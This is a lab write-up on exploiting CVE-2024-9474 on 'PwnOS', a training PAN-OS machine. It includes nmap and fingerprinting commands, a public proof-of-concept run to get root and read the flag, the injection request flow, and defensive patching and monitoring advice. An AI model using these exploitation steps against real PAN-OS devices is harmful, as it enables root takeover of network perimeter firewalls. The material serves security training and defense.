Write-Ups
PwnOS: From Admin to Root—Exploiting CVE-2024-9474
Walk through CVE-2024-9474, a PAN-OS privilege escalation flaw enabling command injection from admin to root. Includes PwnOS demo, exploitation steps, and defense tips.
Table of Contents
PwnOS is a Very Easy Linux machine (Enterprise exclusive) that demonstrates exploiting CVE-2024-9474, a privilege escalation vulnerability affecting Palo Alto Networks PAN-OS web management.
The flaw enables an authenticated PAN-OS admin to perform command injection via the createRemoteAppwebSession.php endpoint and execute commands with root privileges.
This post will walk you through the CVE, service discovery, PAN-OS fingerprinting, exploitation, and defensive guidance.
-
Category: Network device exploitation
-
Platform: PAN-OS (Firewall)
-
Focus: Command Injection, Version Fingerprinting, Privilege Escalation
What is CVE-2024-9474?
-
Type: Privilege Escalation via command injection
-
Affected: PAN-OS 10.1, 10.2, 11.0, 11.1, 11.2
-
Privileges required: Administrator access to the management UI
-
Impact: Execute commands as root
The vulnerable flow abuses createRemoteAppwebSession.php. Crafted input is executed server-side, and output is redirected to a web-accessible path for retrieval.
CVE-2024-9474 is a privilege-escalation vulnerability that allows command injection when an attacker can supply crafted input to the PAN-OS web management endpoint createRemoteAppwebSession.php.
The vulnerability requires administrative access to the management UI—but when the management plane is exposed or admin accounts are poorly protected, that prerequisite becomes trivial to meet. Successful exploitation results in execution of arbitrary shell commands as root, with the output often redirected to a web-accessible path (e.g., /unauth/1.php), providing an easy retrieval channel for attackers.
Here’s why this matters: a management-plane compromise on firewalls lets attackers read configurations, harvest credentials, and persist backdoors—all from a device that sits at the network perimeter. Treat any management-plane vulnerability as high priority.
Skills you’ll use
-
Networking basics: Port scanning, service enumeration.
-
Web analysis: Reviewing HTTP responses, endpoints.
-
Exploitation: Command injection with constrained payloads.
-
Tooling: nmap, PAN-OS fingerprinting utilities.
-
Defense: Patching, access control, monitoring.
Recon and fingerprinting
Start with a full TCP scan to identify exposed services and the management interface. The original commands used in the lab were:
sudo nmap -p- -Pn -T4 --min-rate=1000 -sC -sV 10.129.241.233
The results reveal:
-
22/tcp: OpenSSH 8.0
-
443/tcp: HTTPS with PAN-OS branding in the certificate and resources
Opening the management interface in a browser confirms PAN-OS branding on the login page:
PAN-OS fingerprinting
To determine the running software version, we use panos-scanner by noperator.
git clone https://github.com/noperator/panos-scanner.git
cd panos-scanner
python3 panos-scanner.py -s -t https://10.129.241.233/ -cve | jqTypical output for this target identifies:
{
"target": "10.129.241.233",
"match": {
"date": "2024-02-08",
"versions": ["10.2.8"],
"precision": "approximate",
"resource": "login/images/favicon.ico"
},
"cvelink": "https://security.paloaltonetworks.com/?product=PAN-OS&sort=-cvss"
}The fingerprint points to PAN-OS 10.2.8, which is within the range of builds impacted by CVE-2024-9474. Always cross-check fingerprinted versions against the vendor advisory before taking action on production systems.
Exploitation flow
The vulnerability can be reproduced using a public proof-of-concept. The PoC used in the lab is available and executed as follows:
git clone https://github.com/k4nfr3/CVE-2024-9474.git
cd CVE-2024-9474
python3 exploit_fw.py 10.129.241.233 "id"Expected run (abbreviated):
POST : https://10.129.241.233/php/utils/createRemoteAppwebSession.php/1.js.map
Status Code: 200
PHPSESSID: j45ovng8jc2ennka0lni3ia733
GET : https://10.129.241.233/index.php/.js.map
Status Code: 200
GET : https://10.129.241.233/unauth/1.php
Status Code: 200
Status Content: b'uid=0(root) gid=0(root) groups=0(root)\n'
The output shows uid=0(root), confirming root-level command execution. Note that payloads may be subject to length limits; the PoC handles this by using short commands or staged writes.
You can now issue constrained commands and retrieve their output from /unauth/1.php.
Flag retrieval (Demonstration)
To demonstrate practical impact, the PoC can be used to read files as root, such as a typical root flag on a lab box:
python3 exploit_fw.py 10.129.241.233 "cat /root/flag.txt"
# ...
Status Content: b'b9aa<SNIP>\n'Again: this is a lab demonstration. Do not run the PoC against systems you do not own or have explicit permission to test.
Under the hood
Broken down, the issue relies on three failure points:
-
Endpoint abuse:
createRemoteAppwebSession.phpaccepts user-controlled data that isn’t properly sanitized. -
Command injection: Injected shell commands are executed server-side in a context with elevated privileges.
-
Output redirection: Command results are written to a web-accessible path (e.g., /unauth/1.php) and can be fetched over HTTPS.
High-level request flow:
1. POST /php/utils/createRemoteAppwebSession.php/1.js.map
└── Inject command via vulnerable parameter
2. GET /index.php/.js.map
└── Trigger execution
3. GET /unauth/1.php
└── Retrieve command output
Length constraints and input sanitization issues can be worked around by splitting payloads or using short commands. The critical point is that, once the output is redirected to /unauth/, an attacker can easily fetch it remotely.
Defensive guidance
1. Patch immediately
Follow the vendor advisory and apply the official hotfixes for affected PAN-OS builds.
-
PAN-OS 10.1: >= 10.1.3-h4
-
PAN-OS 10.2: >= 10.2.0-h4
-
PAN-OS 11.0: >= 11.0.0-h4
-
PAN-OS 11.1: >= 11.1.0-h4
-
PAN-OS 11.2: >= 11.2.0-h1
2. Restrict management plane
Limit UI/API access to trusted IP ranges and management networks. Place PAN-OS management interfaces behind jump hosts or VPNs where possible.
3. Require stronger admin authentication
Enforce MFA for admin accounts and avoid shared credentials. Rotate default credentials and apply least privilege on admin roles.
4. Harden and monitor
Enable comprehensive admin action logging. Watch for POSTs to /php/utils/createRemoteAppwebSession.php and GETs to /unauth/*. Alert on unexpected files appearing under /unauth/ and on POST bodies containing shell metacharacters or unusual base64 blobs.
5. Programmatic hygiene
Subscribe to vendor advisories, maintain an appliance inventory with version mapping, and establish a regular patch cadence combined with pre-deployment testing.
4 key takeaways
-
PAN-OS management vulnerabilities are high-impact. When the management plane is exposed, an authenticated admin bug can quickly turn into a full appliance compromise.
-
Accurate fingerprinting and targeted exploitation can yield root access rapidly when a vulnerable build is present.
-
Simple output redirection turns limited command injection into a full read/exfiltration primitive.
-
Defenses are straightforward but must be enforced: patch promptly, segment management, require MFA, and monitor for the request/output patterns described.
